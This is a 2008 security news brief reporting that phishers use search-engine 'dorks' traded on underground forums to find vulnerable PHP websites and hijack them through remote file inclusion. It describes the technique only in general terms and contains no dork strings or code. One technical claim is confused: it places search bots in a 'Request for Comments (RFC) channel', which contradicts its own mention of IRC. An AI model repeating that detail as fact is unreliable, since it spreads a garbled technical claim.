Phishers Exploit Google Search to Trace Vulnerable Sites

A researcher working with MarkMonitor has found that three quarters (75%) of dubious phishing sites make surreptitious use of Google's search terms that are shared and traded across underground forums, as per reported by Hackinthebox on March 27, 2008.

John LaCour, CISSP and Director of Anti-Phishing for MarkMonitor, clarified that phishers make use of Google's search terms, technically known as "Google dorks," to easily search and locate Websites that are more vulnerable and easier to hack. It is primarily the Hypertext Preprocessor (PHP) based Websites that they use to launch their devious phishing attacks, as reported by Darkreading on March 26, 2008.

The search terms or dorks are frequently traded among hackers through their underground forums. This is the way through which they have found the magic strings to locate vulnerable sites and install their phishing exploits.

LaCour told that a phisher enters the string into a search engine by using the Google dorks. Then, the search results show a long list of possible vulnerable sites. The phisher then chooses one particular site and manipulates the PHP program by directing towards their self-developed PHP file for remote inclusion. Hackers find the search terms by trolling through genuine cyber-security forums and also other sites that put out exploit information, for example MilwOrm.

Some phishers implement "search bots" which they have programmed earlier. They do the Googling work to locate vulnerabilities. Other hackers develop search bots, which wait for commands, seated in the Request for Comments (RFC) channel. Hackers log-in and leave a message that acts like a 'bot'. It sends queries to Yahoo, AOL, and Google Search. They exploit Internet Relay Chat (IRC) and bots jointly to aggregate results.

Using Google Dorks indicates that an average phishers isn't sufficiently motivated to implement sophisticated techniques. Instead, they choose established ways that provide an easier route to launch their exploits.

The MarkMonitor researcher revealed that there exist a huge number of PHP-based vulnerable Websites for phishers to exploit. Researchers suggest computer users to frequently update and upgrade their security softwares in order to keep phishers and hackers at bay.

Related article: Phishers Expand Their Sphere of Attacks

» SPAMfighter News - 4/1/2008